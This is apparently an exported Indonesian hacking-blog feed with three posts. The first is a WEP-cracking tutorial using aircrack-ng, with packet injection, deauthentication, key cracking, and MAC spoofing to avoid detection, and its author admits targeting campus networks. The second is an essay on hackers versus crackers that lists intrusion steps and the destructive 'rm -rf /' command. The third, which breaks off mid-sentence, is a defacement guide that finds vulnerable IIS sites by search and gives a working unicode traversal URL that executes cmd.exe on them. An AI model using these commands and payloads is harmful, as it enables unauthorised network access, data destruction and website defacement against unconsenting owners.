rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-4836507192129009470</id><published>2008-02-02T02:32:00.000-08:00</published><updated>2008-06-29T03:52:31.784-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>spofing hacking - how to crack web</title><content type='html'>&lt;p&gt;Saya tidak tahu apa lagi yg mesti saya posting setelah beberapa minggu lalu kehilangan semua backup postingan dari site yg lama. Sehingga memaksa saya berposting ria disini bersama rekan2 bloger&amp;#8217;s wordpress.com. Biar agak keren dikit tapi saya emang dodol, saya akan memberi oleh2 hasil melaut beberapa hari yg lalu. CRACK WEP !!!.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Apa itu CRACK WEP ???&amp;#8230;.&lt;br /&gt;&lt;br /&gt;Saya sendiri juga kurang tahu. Lho &amp;#8230; gak tau koq malah di posting ?? &lt;img src='http://numpanglewat.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /&gt; . Saya hanya tertarik pada bagian cracking security-nya pada wireless network connection. Selaen itu didaerah kmpus saya ternyata banyak juga lhoo yg wireless area nya diprotect. Nahh, bisa jadi bahan percobaan nih. Tapi sialnya saya gak punya tools utk coba cara ini. Itulah gunanya saya posting disini, jika anda udah berhasil maka secepatnya hubungi saya. &lt;img src='http://numpanglewat.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /&gt; &lt;/p&gt;&lt;br /&gt;&lt;p&gt;Tutor ini hasil saduran Tutorial yang ditulis oleh glj12 dengan judul asli &amp;#8221; Spoonfed Hacking - How to Crack WEP (Local Hacking) Tutorial &amp;#8221; di leetupload.com&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Baiklah langsung saja kita persiapkan apa saja yg dibutuhkan :&lt;br /&gt;&lt;br /&gt;&lt;span id="more-35"&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. Laptop (tentunya :D) dg dual boot (Linux n Xp Pro).&lt;br /&gt;&lt;br /&gt;2. CD blank untuk mbakar cd (ya iyalah).&lt;br /&gt;&lt;br /&gt;3. Wireless Card yg bisa diinject (manipulasi-red) or liat list disini.&lt;br /&gt;&lt;br /&gt;4. Baterai yg cukup.&lt;br /&gt;&lt;br /&gt;5. Kismet ato netstumbler (jika ingin aman, Kismet didalam BackTrack 2 sudah komplit).&lt;br /&gt;&lt;br /&gt;6. Ngerti linux sedikit aja &amp;#8230;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Oke Tahap I :&lt;/p&gt;&lt;br /&gt;&lt;p&gt;1. Download dulu ISO BackTrack 2 di http://remote-exploit.org/backtrack_download.html, ato langsung ke tahap II jika udah punya Kismet.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;2. Bakar ISO nya.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Tahap II :&lt;/p&gt;&lt;br /&gt;&lt;p&gt;1. Hidupin BackTrack 2 nya,&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://numpanglewat.wordpress.com/2007/06/22/bt/idupjpg/" rel="attachment wp-att-37" title="idup.jpg"&gt;&lt;img src="http://numpanglewat.files.wordpress.com/2007/06/2.gif" alt="idup.jpg" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;2. Klo udah, BT2 alias BackTrack 2 minta username n passwd. Isi dengan root lalu toor&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://numpanglewat.wordpress.com/2007/06/22/bt/toorjpg/" rel="attachment wp-att-38" title="toor.jpg"&gt;&lt;img src="http://numpanglewat.files.wordpress.com/2007/06/5.gif" alt="toor.jpg" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;3. Udah?? kita selanjutnya akan masuk GUI. Jika anda penggemar linux, pasti udah tau cara masuk GUI. ketik startx.&lt;br /&gt;&lt;br /&gt;4. Jika udah, ntar akan muncul KdE desktop (klo gak slah lhoo&amp;#8230; ). Trus masuk konsole&lt;br /&gt;&lt;br /&gt;5. Trus ketik kismet dan tekan enter&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://numpanglewat.wordpress.com/2007/06/22/bt/komsolejpg/" rel="attachment wp-att-39" title="komsole.jpg"&gt;&lt;img src="http://numpanglewat.files.wordpress.com/2007/06/7.gif" alt="komsole.jpg" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Pic&lt;/p&gt;&lt;br /&gt;&lt;p&gt;6. Secara otomatis Kismet akan meload, mengupdate dan menampilkan semua akses point yang berada di daerah jaringan tsb,&lt;br /&gt;&lt;br /&gt;7. Setelah pilih dan memilih target/korban.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://numpanglewat.wordpress.com/2007/06/22/bt/kisjpg/" rel="attachment wp-att-40" title="kis.jpg"&gt;&lt;img src="http://numpanglewat.files.wordpress.com/2007/06/kismet.gif" alt="kis.jpg" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;8. ketik : iwconfig wlan0 mode monitor&lt;/p&gt;&lt;br /&gt;&lt;p&gt;(Syntax: iwconfig device_name_here mode command_monitor). Jangan lupa di enter, terus ??&lt;/p&gt;&lt;br /&gt;&lt;p&gt;10. Saatnya ngintip :&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Syntax: airodump-ng –-ivs_tipe_ekstensi –-write apaaja –-channel&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Jadi perintahnya airodump-ng &amp;#8211;ivs &amp;#8211;write file_name &amp;#8211;channel 11 wlan0&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://numpanglewat.wordpress.com/2007/06/22/bt/airdumpjpg/" rel="attachment wp-att-41" title="airdump.jpg"&gt;&lt;img src="http://numpanglewat.files.wordpress.com/2007/06/airodump.gif" alt="airdump.jpg" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Perintah tsb akan memulai monitoring dan mengoleksi packet dari channel yg diinginkan.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;11. Terus Nginject yukk&amp;#8230;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Syntax:&lt;/p&gt;&lt;br /&gt;&lt;p&gt;aireplay-ng -3 attack level -b BSSID_router_yg_running -h attached_computer_to_the_bssid_the_router wlan0=tipe_device.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;aireplay-ng -3 -b 00:16:B6:2E:C3:4E -h 00:14:A5:8A:02:CD wlan0&lt;/p&gt;&lt;br /&gt;&lt;p&gt;12. kita akan melakukan deauthentication attack. ketik :&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Syntax : Aireplay-ng -0 attack_number wlan0 device_type_of_yours -a BSSID_router_yg_running wlan0 tipe_device&lt;/p&gt;&lt;br /&gt;&lt;p&gt;aireplay-ng -0 wlan0 -a 00:16:B6:2E:C3:4E wlan0&lt;/p&gt;&lt;br /&gt;&lt;p&gt;13. Hmm.. saya makin pusing nih. Tapi gak apa kita teruskan ..&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Selanjutnya ganti direktori ke file apaaja.ivs yg disave tadi. kemudian eksekusi dengan perintah :&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Syntax: aircrack-ng -0 attack_type -n number_of_the_encryption_type(64 or 128) -fudgefactor 2-18 *.cap or *.ivs&lt;/p&gt;&lt;br /&gt;&lt;p&gt;aircrack-ng -0 -n 128 -f 4 file_name.ivs&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Catt : 00:16:B6:2E:C3:4E &amp;gt;&amp;gt; BSSID dari router yg running&lt;br /&gt;&lt;br /&gt;00:14:A5:8A:02:CD &amp;gt;&amp;gt; Computer yg make BSSID (ditampilkan oleh kismet)&lt;br /&gt;&lt;br /&gt;wlan0          &amp;gt;&amp;gt; device router yg kita gunain.&lt;br /&gt;&lt;br /&gt;-0           &amp;gt;&amp;gt; Jenis serangan&lt;br /&gt;&lt;br /&gt;-n           &amp;gt;&amp;gt; tipe enkripsi (64 ato 128)&lt;br /&gt;&lt;br /&gt;-fudgefactor      &amp;gt;&amp;gt; isi 2-18&lt;br /&gt;&lt;br /&gt;*.cap ato *.ivs   &amp;gt;&amp;gt; ekstensi file yg disave&lt;/p&gt;&lt;br /&gt;&lt;p&gt;AKhirnya &amp;#8230; binGGOOOOO &amp;#8230;. ! . Kita dapetin kunci WEP (hex).&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://numpanglewat.wordpress.com/2007/06/22/bt/binggojpg/" rel="attachment wp-att-42" title="binggo.jpg"&gt;&lt;img src="http://numpanglewat.files.wordpress.com/2007/06/aircrack.gif" alt="binggo.jpg" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Terus langkah selanjutna tinggal konek ke SSID. ganti Mac address n Netbios nya dulu biar gak ketahuan MAC asli kita. Donlot programnya di irongeek.com atau bisa juga pake KMACS (saran red).&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://numpanglewat.wordpress.com/2007/06/22/bt/8jpg/" rel="attachment wp-att-43" title="8.jpg"&gt;&lt;img src="http://numpanglewat.files.wordpress.com/2007/06/8.gif" alt="8.jpg" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://numpanglewat.wordpress.com/2007/06/22/bt/9jpg/" rel="attachment wp-att-44" title="9.jpg"&gt;&lt;img src="http://numpanglewat.files.wordpress.com/2007/06/9.gif" alt="9.jpg" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;N HAving Fun &amp;#8230;&amp;#8230;..&lt;/p&gt;&lt;br /&gt;&lt;p&gt;hacking bukan sekedar TEORI, nahh &amp;#8230;. itulah sebenarna yng benar. Jadi OBROLAN saya diatas tadi adalah bualan belaka. Cos saya belom pernah mempraktekkannya. Karena saya bukan MASTER!!!, jadi saya hanyalah pembual belaka &amp;#8230;&lt;br /&gt;&lt;br /&gt;Jadi ??? jika anda ingin mencobanya silahkan baca tutor aslinya di&lt;/p&gt;&lt;br /&gt;&lt;p&gt;http://www.leetupload.com&lt;/p&gt;&lt;br /&gt;&lt;p&gt;http://digg.com/security/Spoonfed_Hacking_How_to_Crack_WEP_Local_Hacking_Tutorial&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-4836507192129009470?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/4836507192129009470/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=4836507192129009470&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/4836507192129009470'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/4836507192129009470'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/02/spofing-hacking-how-to-crack-web.html' title='spofing hacking - how to crack web'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-517147976848242370</id><published>2008-02-02T02:21:00.000-08:00</published><updated>2008-06-29T03:52:31.785-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>to be hackers</title><content type='html'>&lt;p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.friendster.com/ibnumaks"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 81px; height: 108px;" src="http://photos.friendster.com/photos/45/34/21754354/1_306207027m.jpg" alt="" border="0" /&gt;&lt;/a&gt;Hacker dengan keahliannya dapat melihat &amp;amp; memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan &amp;#8211; mereka biasanya disebut cracker. Pada dasarnya dunia hacker &amp;amp; cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.&lt;br /&gt;&lt;br /&gt;Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik &amp;#8211; jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik &amp;amp; nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut &amp;#8211; karena SDM pihak kepolisian &amp;amp; aparat keamanan Indonesia amat sangat lemah &amp;amp; menyedihkan di bidang Teknologi Informasi &amp;amp; Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.&lt;br /&gt;&lt;br /&gt;Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di &lt;a href="http://www.sans.org/"&gt;http://www.sans.org&lt;/a&gt;, &lt;a href="http://www.rootshell.com/"&gt;http://www.rootshell.com&lt;/a&gt;, &lt;a href="http://www.linuxfirewall.org/"&gt;http://www.linuxfirewall.org/&lt;/a&gt;, &lt;a href="http://www.linuxdoc.org/"&gt;http://www.linuxdoc.org&lt;/a&gt;, &lt;a href="http://www.cerias.purdue.edu/coast/firewalls/"&gt;http://www.cerias.purdue.edu/coast/firewalls/&lt;/a&gt;, &lt;a href="http://www.redhat.com/mirrors/LDP/HOWTO/"&gt;http://www.redhat.com/mirrors/LDP/HOWTO/&lt;/a&gt;. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di &lt;a href="http://www.iss.net/vd/mail.html"&gt;http://www.iss.net/vd/mail.html&lt;/a&gt;, &lt;a href="http://www.v-one.com/documents/fw-faq.htm"&gt;http://www.v-one.com/documents/fw-faq.htm&lt;/a&gt;. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di &lt;a href="http://bastille-linux.sourceforge.net/"&gt;http://bastille-linux.sourceforge.net/&lt;/a&gt;, &lt;a href="http://www.redhat.com/support/docs/tips/firewall/firewallservice.html"&gt;http://www.redhat.com/support/docs/tips/firewall/firewallservice.html&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari &lt;a href="http://pandu.dhs.org/"&gt;http://pandu.dhs.org&lt;/a&gt;, &lt;a href="http://www.bogor.net/idkf/"&gt;http://www.bogor.net/idkf/&lt;/a&gt;, &lt;a href="http://louis.idaman.com/idkf"&gt;http://louis.idaman.com/idkf&lt;/a&gt;. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari &lt;a href="http://pandu.dhs.org/Buku-Online/"&gt;http://pandu.dhs.org/Buku-Online/&lt;/a&gt;. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini &amp;#8211; tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com &amp;amp; linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) &lt;a href="http://www.kpli.or.id/"&gt;http://www.kpli.or.id&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di &lt;a href="http://www.sans.org/newlook/publications/roadmap.htm"&gt;http://www.sans.org/newlook/publications/roadmap.htm&lt;/a&gt;  tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar &lt;a href="http://www.sans.org/newlook/publications/roadmap.htm"&gt;http://www.sans.org/newlook/publications/roadmap.htm&lt;/a&gt;.&lt;br /&gt;Dijelaskan oleh Front-line Information Security Team, &amp;#8220;Techniques Adopted By 'System Crackers' When Attempting To Break Into Corporate or Sensitive Private Networks,&amp;#8221; fist@ns2.co.uk  &lt;a href="http://www.ns2.co.uk/"&gt;http://www.ns2.co.uk&lt;/a&gt;. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 &amp;#8211; karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.&lt;br /&gt;&lt;br /&gt;Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.&lt;br /&gt;&lt;br /&gt;Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner &amp;amp; program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).&lt;br /&gt;&lt;br /&gt;Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.&lt;br /&gt;&lt;br /&gt;Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah 'ls &lt;domain or="" network=""&gt;' , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah 'expn &lt;user&gt;', dan (5) mem-finger user di mesin-mesin eksternal lainnya.&lt;br /&gt;&lt;br /&gt;Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses &amp;amp; eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.&lt;br /&gt;&lt;br /&gt;Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti 'ps' &amp;amp; 'netstat' di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.&lt;br /&gt;&lt;br /&gt;Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon setan).&lt;br /&gt;&lt;br /&gt;Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai &amp;#8216;root&amp;#8217; (administrator tertinggi di server).&lt;br /&gt;&lt;br /&gt;Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan 'clean-up&amp;#8216; operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang 'backdooring'. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh &amp;amp; csh.&lt;br /&gt;&lt;br /&gt;Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah &amp;#8216;rm &amp;#8211;rf / &amp;amp;&amp;#8217;. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.&lt;br /&gt;&lt;br /&gt;Oleh karena itu semua mesin &amp;amp; router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya &amp;amp; di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan &amp;#8216;rm &amp;#8211;rf / &amp;amp;&amp;#8217;.&lt;br /&gt;&lt;br /&gt;Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai &amp;amp; budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.&lt;br /&gt;&lt;br /&gt;Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) &amp;amp; Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak &amp;#8211; bantuan &amp;amp; sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.&lt;br /&gt;&lt;br /&gt;Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, &amp;#8220;To boldly go where no one has gone before&amp;#8221;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Onno W. Purbo&lt;br /&gt;onno@indo.net.id&lt;/user&gt;&lt;/domain&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5773664350252692454-517147976848242370?l=jepunscript-itzone.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jepunscript-itzone.blogspot.com/feeds/517147976848242370/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5773664350252692454&amp;postID=517147976848242370&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/517147976848242370'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5773664350252692454/posts/default/517147976848242370'/><link rel='alternate' type='text/html' href='http://jepunscript-itzone.blogspot.com/2008/02/to-be-hackers.html' title='to be hackers'/><author><name>HACKERS COMMUNITY</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5773664350252692454.post-9117555434170897634</id><published>2008-02-02T02:14:00.000-08:00</published><updated>2008-06-29T03:52:31.781-07:00</updated><title type='text'>deface WS IIS</title><content type='html'>&lt;p&gt;Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketahui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating&lt;br /&gt;System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :&lt;br /&gt;1. IIS (server untuk microsoft, dkk)&lt;br /&gt;2. Unix(linux,BSD,IRIX,SOLARIS,dsb)&lt;br /&gt;&lt;br /&gt;Nah kita kelompokin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu.&lt;br /&gt;&lt;br /&gt;~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~&lt;br /&gt;-------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang&lt;br /&gt;menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.&lt;br /&gt;&lt;br /&gt;OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan&lt;br /&gt;MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..&lt;br /&gt;setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:&lt;br /&gt;&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;&lt;br /&gt;Ada dua kemungkinan yang tampil pada browser Anda yaitu:&lt;br /&gt;Kahiji : Muncul pesan ERROR ...&lt;br /&gt;Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka&lt;br /&gt;www.targethost.com tadi ada kemungkinan untuk bisa kita deface...&lt;br /&gt;&lt;br /&gt;Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :&lt;br /&gt;&amp;#8226; Bagian host, yaitu "http://www.targethost.com"&lt;br /&gt;&amp;#8226; Bagian exploit string, yaitu "/scripts/..%255c..%255c"&lt;br /&gt;&amp;#8226; Bagian folder, yaitu "/winnt/system32/"&lt;br /&gt;&amp;#8226; Bagian command, yaitu "cmd.exe?/c+dir+c:\"&lt;br /&gt;&lt;br /&gt;Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh&lt;br /&gt;file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"&lt;br /&gt;atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge&lt;br /&gt;tahui konfigurasi IP address komputer tujuan dengan mengetikkan 